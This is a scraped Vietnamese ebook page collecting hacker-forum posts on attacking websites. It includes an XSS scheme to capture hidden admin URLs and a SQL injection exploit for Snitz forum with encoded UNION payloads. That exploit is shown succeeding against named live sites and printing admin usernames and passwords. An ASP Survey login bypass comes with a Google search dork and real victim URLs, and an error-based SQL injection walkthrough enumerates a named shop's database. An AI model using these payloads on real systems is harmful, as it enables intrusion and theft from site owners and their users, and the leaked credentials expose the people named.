1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 228 potx

6 270 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 144,95 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

acunetix hay các tools khác scan cấu trúc wếbit chỉ đơn giản là lần theo các link trên 1 site và kiểm tra các link đó có 'sông' ko.. từ đó hình thành ra cấu trúc website--> phần lớn ko s

Trang 1

acunetix hay các tools khác scan cấu trúc wếbit chỉ đơn giản là lần theo các link trên 1 site và kiểm tra các link đó có 'sông' ko từ đó hình thành ra cấu trúc

website > phần lớn ko scan đc link admin trừ khi link đó hiện hữu khi bạn duyệt site đó tất nhiên các tốl kiểu thế bi h cũng có sẵn 1 thư viện các link admin thường có(/admin/,/login/,/manage/ chẳng hạn) rồi tốl k/tra xem link đó có hoạt động ko thế thôi :|

về nguyên tắc là phải đoán hết bạn a

ngoài ra :-? cùng còn nh` cách khác nhưng khá khó thực hiện

rek ví dụ ra 1 kịch bản nhé

có 1 site ẩn link admin, forum đó có 1 phần news và members đc quyền submit, nhưng trc khi news sbumittted by users đc đăng lên site, nó cần đc approve by admin, bất ngờ thay có 1 bug XSS ở đó X))) và bạn submit 1 cái news exploit, khi admin view news đó, nó tự forward đến 1 page bạn tao sẵn page đó lưu lại referer (chính là link admin) rồi lại forward admin về admin control panel X))) thế

mọi chuyện đều có thể xảy ra

ngoài ra cũng có trường hợp link admin nằm trong cả database X))) quan trọng là phải tỉnh táo phân tích + hành động

chúc thành công

Rekcor(vniss)

Khai thác lổi SQL injection ở Snitz 2000 v.3.3.03, by tsbeginnervn

By Elite Members of Attack Team :: MATRIX 2K Hackers Association

@2003-2004

Sản phẩm:Snitz forum

Phiên bản:Snitz 2000 v.3.3.03

Nơi cung cấp:http://forum.snitz.com/

Lổi:Sql injection

Nguy hiểm:Cao

Tác giả:©MATRIX 2K Attack Tem

=======================

Sơ lược:

Snitz forum là một forum phổ biên trên net nhưng không vì thế mà không có lổi chúng ta thử nhìn code của file: pop_mail.asp

=======================

Trang 2

strSql = "SELECT M.M_EMAIL, M.M_NAME FROM " &

strMemberTablePrefix & "MEMBERS M"

strSql = strSql & " WHERE M.MEMBER_ID = " & Request.QueryString("ID")

=======================

Nguy hiểm nằm ở chổ tôi bôi màu đỏ ta thử xem xét có làm được gì không nhé

Nếu url có dạng /pop_mail.asp?ID=1 thì câu truy vấn có dạng:

Trích:

SELECT M.M_EMAIL, M.M_NAME FROM FORUM_TABLE.MEMBERS M WHERE M.MEMBER_ID = 1

Ta thử khai thác như thế nào:

Code:

/pop_mail.asp?ID=1 UNION SELECT 1,M.M_NAME+'/'+M.M_PASSWORD FROM FORUM_MEMBERS M WHERE M.MEMBER_ID = 1

Encode có dạng:

Code:

/pop_mail.asp?ID=1%20UNION%20SELECT%201%2cM.M_NAME%2b%27/

%27%2bM.M_PASSWORD%20FROM%20FORUM_MEMBERS%20M%20WH ERE%20M.MEMBER_ID%20=%201

Thì câu truy vấn trở thành:

Code:

SELECT M.M_EMAIL, M.M_NAME FROM FORUM_TABLE.MEMBERS M WHERE M.MEMBER_ID = 1UNION SELECT

1,M.M_NAME+'/'+M.M_PASSWORD FROM FORUM_MEMBERS M WHERE M.MEMBER_ID = 1

và trả về cho ta username và password của thành viên số 1

Chú ý : với lệnh UNION, để trả về được kết quả số cột trong câu lệnh 1 fải đúng bằng số cột trong câu lệnh 2, nếu ta có SELECT M.M_EMAIL, M.M_NAME thì câu lệnh 2 phải là SELECT 1,M.M_NAME+'/'+M.M_PASSWORD khi đó số một (1 ) sẽ thay cho 1 cột mặc định và luôn true, kết quả tên và password được union với M_NAME và trả ra màn hình

Test trên site:

http://psi.totalgamers.net/forums/pop_mail.asp?id=1%20UNION%20SELECT%20 1,M.M_NAME%2b

'/'%2bM.M_PASSWORD%20FROM%20FORUM_MEMBERS%20M%20WHER

Trang 3

E%20M.MEMBER_ID%20=%201

Kết quả:

Trích:

Send an EMAIL Message

Click to send Admin/g02a1z79 an email

Close Window

user:admin

pass:g02a1z79

http://www.emmathevet.co.uk/forum2/pop_mail.asp?id=1%20UNION%20SELEC T%201,M.M_NAME%2b

'/'%2bM.M_PASSWORD%20FROM%20FORUM_MEMBERS%20M%20WHER E%20M.MEMBER_ID%20=%201

Kết quả:

Trích:

Send an EMAIL Message

Click to send AXOSADMIN/CAMBRIDGE an email

Close Window

user:AXOSADMIN

pass:CAMBRIDGE

Neo(VNISS)

sql injection ở ASP Survey

Thể loại : by pass

Sp : ASP Survey

Ngày công bố : 04/02/2006

Mô tả : Một lỗi đơn giản và dễ khai thác, rất phù hợp để cho những ai tập Hack có

cơ hội để thực hành

Thực hiện :

1 Tìm kiếm trên google với từ khóa : allinurl:"login.asp" ASPsurvey

2 nếu may mắn bạn có thể login : http://victim.com/Admin/login.asp với user và password sau :

Trang 4

User : admin

Password : 'or'

3 Demo :

http://www.cszinc.com/ASPSurvey/Admin/Login.asp

http://www.greenville.k12.sc.us/ASPS dmin/Login.asp

và còn nhiều site khác

Neo(VNISS)

Hướng dẫn SQL injection trong shop.leadtools.com

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)

May 3 2005 23:18:38

Copyright (c) 1988-2003 Microsoft Corporation

Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

/LEADDB/shop.leadtools.com/shopuser

Code:

https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54 and

1=convert(int,@@version) sp_password

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to a column of data type int (Lấy thông tin của server)

Server name :'LEADDB'

Code:

https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54 and

1=convert(int,@@servername) sp_password

DB Name : 'shop.leadtools.com'

Code:

https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54 and

1=convert(int,db_name()) sp_password

System user : 'shopuser'

Trang 5

Domain Admin

https://shop.leadtools.com/shopdispl p?catalogID=54 and 1=convert(int,(select top 1 name from master sysusers where roles=0x01 and name not in('dbo'))) sp_password

Code:

https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54 and

1=convert(int,(select top 1 table_name from

information_schema.tables)) sp_password

=>Dò table name đầu tiên đc KQ là affiliatelog

Code:

https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54 and

1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in

('affiliatelog','coupons','customerprices','customers','affiliates','billing','categories','c onfiguration','configuration1','DownloadHistory','downloads','dtproperties','gifts','h ackers'))) sp_password

Dò các table khác qua toán tử not in cứ thế thêm vào các table đến khi nó 0 trả lại giá trị nào nữa

Ta đc các table :

Danh sach cac bang

affiliatelog

affiliates

billing

categories

configuration

configuration1

coupons

customerprices

Trang 6

customers

DownloadHistory

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN